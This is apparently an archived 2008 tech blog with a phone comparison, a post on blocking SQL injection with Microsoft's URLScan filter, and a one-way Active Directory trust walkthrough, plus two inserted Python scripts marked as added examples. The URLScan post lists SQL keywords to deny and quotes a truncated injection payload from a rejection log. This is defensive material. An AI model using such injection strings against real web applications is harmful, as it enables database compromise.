Aug 31 2008

HTC Touch Diamond vs Apple iPhone 3G

I was able to play with the only just released and, for me, long-awaited HTC Diamond the other day. I was extremely excited about this phone, having seen many videos and reviews. We all know the iPhone was released not too long ago either, as the also long-awaited 3G platform, and while I praise what Apple has done with the iPhone (they have opened a whole new world of functionality and features), in doing this I seem to read nothing but flaws with the iPhone. Apple were clearly under pressure to get the 3G phone out in the wild by setting official dates; however, this has come at a BIG cost to Apple.

Here is the latest of Apple's issues with the iPhone.

Anyway, back to the HTC vs the iPhone.

After playing with the HTC, I walked away less than impressed. Why? Well, mostly, I am sure, because of the hype stirred up around the phone, but also because I found the touch functionality still not to be on par with the iPhone's ease of touch and movement.

I found zooming into pictures needed a full 360 of your finger rather than, say, a 180 twirl, and the flick of the finger across the side bar of the HTC seemed to be random in terms of what it would select; there was no nice graphical movement like the iPhone.

On the upside, the on-screen keyboard is surprisingly easy to use and registers the touch much, much better than previous models. Of course the on-screen display is made bigger, but even with my fat fingers it seems very easy to use; for those with even fatter fingers than me, well, you can use the condensed QWERTY keyboard, or other alternatives.

Another upside is its cool-looking display, and the layout is easy to use; the menus have been made larger, or finger friendly, rather than using the stylus all the time.

And in terms of the form factor, well, they are both on par with each other.

All in all, my thoughts are that the iPhone's ease is still a winner; HTC do have some work to do to match the iPhone, but then the HTC is working off the mature and proven Windows Mobile, and let's face it, the amount of things that you can do with Windows Mobile is phenomenal.

If I had to choose I would still go the HTC, but for me I am going to play the waiting game a little more for the HTC Touch Pro; this to me is more of a power / business user's phone.


Aug 13 2008

Bye Bye SQL Injections

With SQL injections becoming more prevalent in the last few years we need to find better ways of defending ourselves against these attacks; it seems that only the other week there was a new injection that has infected thousands of SQL servers [READ MORE HERE]

So here is a method by which we can say bye bye to SQL injection.

Well, not completely, but maybe a large percentage of them. How, you ask… well, simple, code better… no, no, really, I don't claim to be a developer / coder by any means, and I would hate to think how hard it would be to cover every hole in a web application that was reasonably sized; in fact it might be near impossible?

Anyway, back to the topic. I was alerted to an application called 'URLScan' (specifically 3.0 beta). It is a free Microsoft application that acts as an ISAPI filter for IIS 5.1, IIS 6 and IIS 7. After reading a bit about it my eyes were starting to open wider and wider; the things that you can do with this tiny filter are simply amazing. It is nothing but a simple filter process where you can allow or deny access to file extensions, limit accepted URL length, allow / deny verbs, allow / deny access to URL strings, and the list goes on. Now, yes, we can do some of these things in IIS, especially in IIS 7, as it has brought a few of these functions to the table by default, but the ease of configuration and the expandability of this just blows using IIS's additional security functions out of the water.

Here is a screenshot of the default .ini file; as you can see, there are many nifty features in the standard ini file. Some, you will see, you can already control in IIS.

image

So why would you use this over IIS, for example in terms of the obvious, what pages are accepted and what pages are declined? Well, simple: the logging is much easier to read to the human eye; you can easily skim through it and find what you need quickly. With IIS, if you are logging everything (which, if you run stats that collect IIS log files, you will have turned on), then the log files quickly become hard to read at first glance.

Here is a snippet of the log file output:

[08-13-2008 - 01:13:06] ----- UrlScan v3.0 Beta Config Initialization ----
[08-13-2008 - 01:13:06] The following verbs will be allowed: GET, HEAD, POST
[08-13-2008 - 01:13:06] The following extensions will not be allowed: .exe, .bat, .cmd, .com, .htw, .ida, .idq, .htr, .idc, .shtm, .shtml, .stm, .printer, .ini, .log, .pol, .dat, .config
[08-13-2008 - 01:13:06] The following URL sequences will be denied: .., ./, \, :, %%, &
[08-13-2008 - 01:13:06] The following Query String sequences will be denied: %%3C, %%3E, sql injection], appliesto=.asp,.aspx, denydatasection=sql injection strings, scanurl=0, scanallraw=0, scanquerystring=1, scanheaders=
[08-13-2008 - 01:13:06] The following rules are active: 
[08-13-2008 - 01:30:37] Client at 66.249.67.77: URL contains sequence '\', which is disallowed. Request will be rejected.  Site Instance='701014', Raw URL='/images%%5Cbtn_add.gif'

As you can see, it shows URLScan starting up with what is being denied or allowed; the last line shows an entry where a request from an IP address was rejected because it contained a disallowed sequence.

I mentioned expandability previously; there is just so much you could do with this. As an example, here is some expandability you could tack on to the scanning rules to stop SQL injections. It's as simple as copy and paste into your INI file, that's it….

 
[RuleList]
; Rule sections must be listed here; URLScan ignores rules that are not
; registered (the log then reports no active rules).
SQL Injection
SQL Injection Headers

[SQL Injection]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=

[SQL Injection Strings]
--
%3b ; a semicolon (a bare ; at the start of a line would be read as a comment)
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
create
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
insert
kill
open
select
sys ; also catches sysobjects and syscolumns
table
update

[SQL Injection Headers]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=0
ScanHeaders=Cookie:

[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
cast
convert
create
declare
delete
drop
exec ; also catches execute
fetch
insert
kill
select

Obviously there are problems with this, because chances are your web app uses some of these within a query string to retrieve data from the database, but it's a great starting point. I would suggest running it all on a dev server first: watch the log file and see what is being rejected, and if you know it is needed then simply comment out the item that was denied; this will then allow it. It's a simple process of elimination.

The other thing I have found with a considerable number of SQL injections is that they are very long strings. I found a number of injections and then took a count of them all; it averaged around 1050 characters. So if your web app doesn't have extremely long query strings, why not reduce the number of allowed characters?
Say, for example (MaxQueryString lives in the [RequestLimits] section of URLScan.ini):

[RequestLimits]
MaxQueryString=800

If you do this I do suggest monitoring it to ensure your web app is not in fact generating massive query strings.

Since applying URLScan I have tried sending through injection attacks (harmless ones) and so far they have failed and been caught by URLScan. Here is an attempt from a log file from a test injection:

[08-13-2008 - 00:54:46] Client at 190.77.130.45: Query string length exceeded maximum allowed. Request will be rejected.  Site Instance='2041367400', QueryString='ArticleID=335&PrintFriendly=True;DECLARE%%20@S%%20VARCHAR(4000);SET%%20@S=CAST(0x…%%20AS%%20VARCHAR(4000));EXEC(@S);--', Raw URL='/Default.aspx'
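The process of elimination described above (run the rules on a dev server, watch the log, see which sequence fired and decide whether the rule can stay) and the monitoring suggested for MaxQueryString both come down to reading the rejection lines. The following Python script is an added example, not part of this post and not something URLScan ships: it parses rejection lines in the format of the excerpts above, counts what fired per reason, per sequence and per client, and lists the lengths of the query strings that tripped the limit. The sample log lines are constructed (addresses, site instances and paths are made up), and treating '%%' in the log as an escaped '%' is an assumption drawn from the excerpts on this page.

```python
import re
from collections import Counter

# Constructed sample modelled on the URLScan 3.0 log excerpts in this post: the
# client addresses, site instances and paths are made up. The last line carries a
# deliberately oversize query string so that the MaxQueryString case is covered.
LONG_QS = "ArticleID=335&PrintFriendly=True;" + "A" * 900
SAMPLE_LOG = (
    "[08-13-2008 - 01:13:06] ----- UrlScan v3.0 Beta Config Initialization ----\n"
    "[08-13-2008 - 01:13:06] The following verbs will be allowed: GET, HEAD, POST\n"
    "[08-13-2008 - 01:30:37] Client at 192.0.2.10: URL contains sequence '\\', "
    "which is disallowed. Request will be rejected.  Site Instance='701014', "
    "Raw URL='/images%%5Cbtn_add.gif'\n"
    "[08-13-2008 - 01:41:02] Client at 192.0.2.10: Query string contains sequence "
    "'select', which is disallowed. Request will be rejected.  Site Instance='701014', "
    "QueryString='view=select', Raw URL='/report.aspx'\n"
    "[08-13-2008 - 00:54:46] Client at 198.51.100.7: Query string length exceeded "
    "maximum allowed. Request will be rejected.  Site Instance='2041367400', "
    f"QueryString='{LONG_QS}', Raw URL='/Default.aspx'\n"
)

# One rejection entry: timestamp, client, the reason sentence, then Key='value' fields.
REJECT_RE = re.compile(
    r"^\[(?P<date>\d\d-\d\d-\d{4}) - (?P<time>\d\d:\d\d:\d\d)\] "
    r"Client at (?P<client>\S+): (?P<reason>.+?)\. Request will be rejected\.\s*"
    r"(?P<fields>.*)$"
)
# Key='value' pairs. A value may itself contain a quote (injection payloads often
# do), so a value ends only at a quote followed by the next key or the end of line.
FIELD_RE = re.compile(
    r"(?P<key>[A-Za-z][A-Za-z ]*?)='(?P<value>.*?)'(?=, [A-Za-z][A-Za-z ]*?='|$)"
)
SEQ_RE = re.compile(r"sequence '(?P<seq>.+?)', which is disallowed")


def parse_line(line):
    """Parse one rejection line into a dict; return None for any other line."""
    m = REJECT_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    entry = {
        "date": m.group("date"),
        "time": m.group("time"),
        "client": m.group("client"),
        "reason": m.group("reason"),
    }
    for f in FIELD_RE.finditer(m.group("fields")):
        # Assumption drawn from the excerpts above: the log writes '%%' where the
        # request held a single '%', so undo that before measuring or comparing.
        entry[f.group("key")] = f.group("value").replace("%%", "%")
    s = SEQ_RE.search(entry["reason"])
    entry["sequence"] = s.group("seq") if s else None
    return entry


def parse_log(text):
    """All rejection entries in a log, in file order; config/startup lines are skipped."""
    return [e for e in (parse_line(line) for line in text.splitlines()) if e]


def summarize(entries):
    """What to look at before loosening a rule: which sequences fire, how often, from where."""
    sequences = Counter(e["sequence"] for e in entries if e["sequence"])
    return {
        "by_reason": Counter(e["reason"] for e in entries),
        "by_client": Counter(e["client"] for e in entries),
        "by_sequence": sequences,
        "clients_per_sequence": {
            seq: sorted({e["client"] for e in entries if e["sequence"] == seq})
            for seq in sequences
        },
    }


def query_string_lengths(entries):
    """Lengths of query strings that tripped MaxQueryString, smallest first, for tuning the limit."""
    return sorted(
        len(e["QueryString"])
        for e in entries
        if e["reason"].startswith("Query string length exceeded") and "QueryString" in e
    )


if __name__ == "__main__":
    found = parse_log(SAMPLE_LOG)
    for key, counts in summarize(found).items():
        print(key, dict(counts))
    print("oversize query strings:", query_string_lengths(found))
```

A sequence that fires only for your own application's pages and only from expected clients is a candidate for commenting out of the deny list; a sequence that fires from many unrelated addresses is doing its job. The length list shows how far below the configured limit your legitimate traffic sits, which is what you need to know before lowering MaxQueryString further.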

 

Download URLScan 3.0 Beta (for x86 machines) here
Download URLScan 3.0 Beta (for x64 Machines) here


Aug 6 2008

Windows Mobile: What lies ahead

Found a fantastic post on Windows Mobile and the future of Windows Mobile: what is required and where it's headed.

For those Windows Mobile fans, definitely worth a read.

http://gizmodo.com/gadgets/what.s-wrong-with-windows-mobile/whats-wrong-with-windows-mobile-and-how-wm7-and-wm8-are-going-to-fix-it-333536.php


Aug 4 2008

Active Directory – Creating One Way Domain Trusts

Thought I might do a quick blog about creating a one-way trust, as I found there to be little text on the following scenario, where the primary domain has access to the other domain, but the secondary domain only has access to itself.

OK, so if you have the same requirement, the first thing is: don't bother creating a child domain within the same forest as the current domain. You can't seem to create a one-way trust; by default Microsoft will create a two-way trust. So that means you must create a domain in a separate forest. Whilst there is a bit more involved in setting up the forest, in terms of allowing domain admins rights to manage the other domain etc., it will be well worth it in the long run from a security perspective.

Anyway, run dcpromo and create a new forest, and follow the prompts; there are stacks of text on this so I am not going to ramble on about this one.

Once the new domain is created, open 'Active Directory Domains and Trusts' on the primary domain, find the domain, right-click, Properties, and go to the 'Trusts' tab.

(Before you do this setup you will most likely have DNS issues; I would spend a bit of time sorting that out first, otherwise the next steps will not work.)

Now you should have nothing there at present.

Here you will have to enter the other forest's domain, choose trust with a Windows domain, then Next.

Make sure you choose a one-way: incoming trust.

image

 

THIS is really important: if you don't choose 'This domain only' it will NOT create a one-way trust in the way that we want.

image

Enter a password for the trust.

image

Here say No, because at this point you only have the one side of the trust, so there is nothing to confirm it against yet.

image

 

Now go back and do the same with the other domain; however, the only difference is you're looking for the primary domain as the trust partner, and you will need to specify an outgoing trust:

“Outgoing: Users in the specified domain can authenticate in the local domain, but users in the local domain cannot authenticate in the specified domain.”

 

Once you have done this, go to the properties of the trust and you will see a Validate button; click on this and put in your administrator credentials for each domain. On completion it should give you the message below:

image 

 

That's it, you have a one-way trust!

For more reading on this have a look at: http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/deploy/dgbe_sec_ztsn.mspx?mfr=true
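The wizard screens above are easy to get backwards, and Validate only tells you the trust works, not that it works in one direction only. What the wizard writes is a trustedDomain object on each side whose trustDirection attribute carries the incoming/outgoing choice (inbound = 1, outbound = 2, both = 3) and whose trustAttributes carries the non-transitive and SID-filtering bits. The following Python check is an added example, not part of this post: it models the two domains' trust objects as dicts (domain names and values are constructed placeholders, shaped like what a directory query of the objects would return), works out who can authenticate where over the direct trust, and reports anything that departs from the topology the post wants.

```python
# Bit values of the trustDirection and trustAttributes attributes on Active
# Directory trustedDomain objects.
TRUST_DIRECTION_INBOUND = 0x1   # partner trusts this domain: this domain's users can authenticate there
TRUST_DIRECTION_OUTBOUND = 0x2  # this domain trusts the partner: the partner's users can authenticate here
TRUST_ATTRIBUTE_NON_TRANSITIVE = 0x1
TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x4  # SID filtering ("quarantine") enabled
TRUST_ATTRIBUTE_FOREST_TRANSITIVE = 0x8   # a forest trust rather than an external (domain) trust


def trust_object(trusts, domain, partner):
    """The trustedDomain object held by `domain` that describes `partner`, or None."""
    for tdo in trusts.get(domain, []):
        if tdo["trustPartner"].lower() == partner.lower():
            return tdo
    return None


def can_authenticate(user_domain, resource_domain, trusts):
    """Can a user from user_domain authenticate in resource_domain over a direct trust?

    Only direct trusts are followed: the external trust this post creates is
    non-transitive, so no path through a third domain is considered.
    """
    if user_domain.lower() == resource_domain.lower():
        return True
    here = trust_object(trusts, resource_domain, user_domain)   # resource side must trust the user's domain
    there = trust_object(trusts, user_domain, resource_domain)  # user side must hold the matching inbound object
    return (
        here is not None and bool(here["trustDirection"] & TRUST_DIRECTION_OUTBOUND)
        and there is not None and bool(there["trustDirection"] & TRUST_DIRECTION_INBOUND)
    )


def check_one_way(primary, secondary, trusts):
    """Findings for the post's topology: primary users may authenticate in secondary, never the reverse."""
    findings = []
    if not can_authenticate(primary, secondary, trusts):
        findings.append(f"{primary} users cannot authenticate in {secondary}: the incoming/outgoing pair is incomplete")
    if can_authenticate(secondary, primary, trusts):
        findings.append(f"{secondary} users can authenticate in {primary}: the trust is not one way")
    for domain, partner in ((primary, secondary), (secondary, primary)):
        tdo = trust_object(trusts, domain, partner)
        if tdo is None:
            continue
        attrs = tdo["trustAttributes"]
        if attrs & TRUST_ATTRIBUTE_FOREST_TRANSITIVE or not attrs & TRUST_ATTRIBUTE_NON_TRANSITIVE:
            findings.append(f"{domain}: trust to {partner} is transitive; the post wants a non-transitive external trust")
        if not attrs & TRUST_ATTRIBUTE_QUARANTINED_DOMAIN:
            findings.append(f"{domain}: SID filtering is off for {partner}; SIDs from outside that domain (e.g. sidHistory) would be accepted")
    return findings


# Constructed sample (placeholder domain names): the two trust objects as they
# should look once the post's steps are done, and the same pair as a two-way trust.
EXTERNAL = TRUST_ATTRIBUTE_NON_TRANSITIVE | TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
GOOD = {
    "corp.example": [{"trustPartner": "lab.example", "trustDirection": TRUST_DIRECTION_INBOUND,
                      "trustAttributes": EXTERNAL}],
    "lab.example": [{"trustPartner": "corp.example", "trustDirection": TRUST_DIRECTION_OUTBOUND,
                     "trustAttributes": EXTERNAL}],
}
TWO_WAY = {
    "corp.example": [{"trustPartner": "lab.example",
                      "trustDirection": TRUST_DIRECTION_INBOUND | TRUST_DIRECTION_OUTBOUND,
                      "trustAttributes": EXTERNAL}],
    "lab.example": [{"trustPartner": "corp.example",
                     "trustDirection": TRUST_DIRECTION_INBOUND | TRUST_DIRECTION_OUTBOUND,
                     "trustAttributes": EXTERNAL}],
}

if __name__ == "__main__":
    for name, trusts in (("one-way", GOOD), ("two-way", TWO_WAY)):
        print(name, check_one_way("corp.example", "lab.example", trusts) or ["ok"])
```

Run against the real objects, the point of the check is the second finding: a two-way trust passes Validate just as happily as the one-way trust the post sets out to build.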